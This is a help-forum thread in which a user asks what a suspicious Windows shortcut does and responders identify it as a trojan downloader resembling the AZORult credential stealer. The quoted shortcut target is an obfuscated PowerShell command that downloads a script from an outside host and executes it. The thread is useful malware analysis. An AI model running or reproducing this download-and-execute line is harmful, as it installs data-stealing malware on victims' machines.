Jump to content

Shortcut file virus


Recommended Posts

I have a shortcut launcher,which is 1 gb file so i think its virus of some sorts

this is what i found in the target properties of shortcut-
 

Quote

 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq


 

Can someone tell me what it does ?

Link to post
Share on other sites

No signs that it is a virus nor that it was generated by a virus. It is a trojan. 

The mini script in the LNK file you provided downloads a file purported to be info.doc but it is a large PowerShell script.

It downloads [ from: dir.k.o.n.pserver.ru (185.118.165.205) using TCP port 4577 ] what is purported to be read.doc but it isn't.  It's a malicious executable.

https://www.virustotal.com/en/file/bdf37aa3ce8a38f084d93317eadd3eb0d9306349d4362d4a7e05e322dbfc6e0f/analysis/1556814531/

https://www.virustotal.com/en/file/6d3f2feaae92b740a3f119bf12547ac54bd7abc6795e397a0483c344e51cd54e/analysis/1556814693/ 

While it is not reflected by Virus Total, the payload, which are trojans, are detected by MBAM.  The following is an except from the scan log.

Quote

MachineLearning/Anomalous.97%, C:\1\1\1\ZEY.EXE, No Action By User, [0], [392687],1.0.10434
MachineLearning/Anomalous.100%, C:\1\1\1\TIN.EXE, No Action By User, [0], [392687],1.0.10434

 

Link to post
Share on other sites

As noted, it is not a virus.  It is a trojan.

It has properties associated with the AZORult trojan and it is a data stealing trojan.

It tries to harvest and steal the following which includes, but may not be limited to...

  • Putty / WinSCP information (sessions, passwords, etc)    
  • Web Browser information (history, passwords, etc)    
  • FTP login credentials    
  • Crypto-Currency Wallets    
  • Instant Messenger accounts and password credentials
  • Email credentials (via file access)

 

Link to post
Share on other sites

  • Root Admin

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.